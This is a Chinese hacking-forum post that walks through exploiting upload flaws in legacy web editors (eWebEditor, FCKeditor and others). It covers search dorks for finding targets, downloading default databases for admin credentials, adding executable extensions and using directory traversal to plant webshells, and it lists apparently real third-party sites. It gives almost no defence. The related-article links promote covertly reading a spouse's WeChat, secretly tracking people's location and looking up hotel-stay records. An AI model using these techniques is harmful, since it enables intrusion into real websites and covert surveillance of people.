搜索编辑器漏洞

访客4年前关于黑客接单836

site:editor inurl:asp?id   inurl:ewebeditornet

比如常见的编辑器漏洞有:

ewebeditor 
ewebeditornet   
fckeditor
editor  
southidceditor
SouthidcEditor
bigcneditor


一:ewebeditor为例


1:默认下载下来的后台:


   http://www.test.com/ewebeditor/admin_login.asp

后台如果能进入:

可点击样式管理:

standard 拷贝一份(直接修改改不了)

在拷贝的一份里加入图片类型( asa aaspsp )   然后点预览

在编辑器里点设计     然后直接上传asa大马.

上传后 在代码里可以看到马的位置!

(原理:因为在iis里 网站的属性里 应用程序配置一项   asa扩展名还是用asp.dll来解析的,asp也是   还有 cer cdx )

在cer cdx asa的被删掉   那么马儿就找不到 映射不过去.

可以在拷贝过后的样式 图片类型里加入 aaspsp 然后在上传 直接就可以上传asp文件


2:下载默认数据库

www.test.com/ewebeditor/db/ewebeditor.mdb

然后分析数据库

webeditor_system(1) 就可以看到用户名和密码   如果破解不出来

可以在webeditor_style(14 样式表里

主要看允许上传文件的扩展名(s-fileext s_ingeext)

看到一个小黑客曾经搞过 多了asa aaspsp

可以用他来利用!(后台找不到的情况下也可以用此 *** )

可以构造语句:

比如   ID=46     s-name =standard1

构造 代码:   ewebeditor.asp?id=content&style=standard

             ID和和样式名改过后

             ewebeditor.asp?id=46&style=standard1


然后就是进入编辑器   上传asa 或者asp的     得到webshell

二:ewebeditornet 漏洞利用

默认上传地址:

    www.test.com/ewebeditornet/upload.aspx


可以直接上传一个cer的木马

在无法上传的情况下

可以地址栏构造以下代码:   javascript:lbtnUpload.click();

然后查看源代码:

找到uploadsave   找到地址

默认传到uploadfile这个文件夹里

(漏洞修补: 可以在iss里直接把upload文件夹的执行权限选择无. )

三:fckeditor   漏洞利用

http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=Image&CurrentFolder=/
就把文件名字段改成NEWfile 选择文件名可定义
上传过后在/userfiles/image/找文件


四:southidceditor

http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb

http://www.xhkjit.com/admin/southidceditor/popup.asp

http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp


五:bigcneditor

这个页不多说了

原理都差不多!

防范 *** 很简单就不多讲了,


FCKeditor上传漏洞,

http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp

打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是:
http://www.xxx.com/UserFiles/all/1.asa
"Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.

比如输入:
http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp

所传的文件就到了 http://www.xxx.com/UserFiles/monyer/ 下了

而 如果这样输入:http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser /default/browser.html?Type=../&Connector=connectors/asp/connector.asp
就可以传到网站的根目录下,网站支持什么脚本,传什么脚本的马就可以了.

所传的文件就到了网站根目录下了

http://www.b-horse.cn/newEbiz1/EbizPortalFG/portal/html/BBSThreadMessageMaint.html?forumID=46&threadID=457&messageID=532&ListType=FromForum&FromCurrentPage=1&time=1219282232781

标签: 好话题

相关文章

如何查看已删除的微信聊天记录 怎么能知道他人的微信聊天记录

如何查看已删除的微信聊天记录 怎么能知道他人的微信聊天记录 SOP(标准操作程序)实际上只是一个文件的名称,其中包含一组详细说明,可以更轻松地将工作职责从一个人传递到另一个人。 在创建业务时,尤其...

怎样偷偷登录老婆的微信号(不被发现)黑科技接收聊天记录_微信聊天

我想向您介绍一个可以轻松模拟微信聊天记录的应用程序。截图很有效,足以混淆真假。至少有这样的可能,对不对? 敲黑板,重要知识点:注意,是做微信聊天记录的截图,不是微信聊天记录,黑科技接收微信聊天记录...

开的房记录保存多久在个人档案里面

其实,很多人最怕的一些事情就是在自己的个人档案上留下一些不好的印象。所以很多人为什么不敢去违反法律,就是因为这些东西都会在自己的档案上留下不可磨灭的印象。对于一些偷情的人来说开的房的记录又何尝不是一些...

微信定位大师,轻松转换自己的位置_腾讯网

现如今的人使用手机已经不仅仅是只适用于打电话,也会使用一些微信等软件,那微信一个很重要的可以定位位置的就是微信定位大师,他是使用在安卓系统里面的。不仅可以定位对方的位置,同时还可以更换自己的位置。...

2019在线查开放房网址 2000万查房网网址

【编者按】当你和一对夫妇住在酒店时,你会遇到“警察”来检查房间。你怎么能证明这段关系?当旅游已经成为一种流行的加压方式时,越来越多的人会选择在假期来临时与亲朋好友见面或带着另一半去旅游。一路上,他们会...

不惊动对方通过微信查对方位置(用微信悄悄查别人位置)

不惊动对方通过微信查对方位置 自从微信开始使用以来,人们交友非常方便快捷,因为添加了一个人的微信后,可以通过语音或视频聊天。现在微信越来越强大。添加一个人的微信也更加方便。比如,可以通过以下方式和方...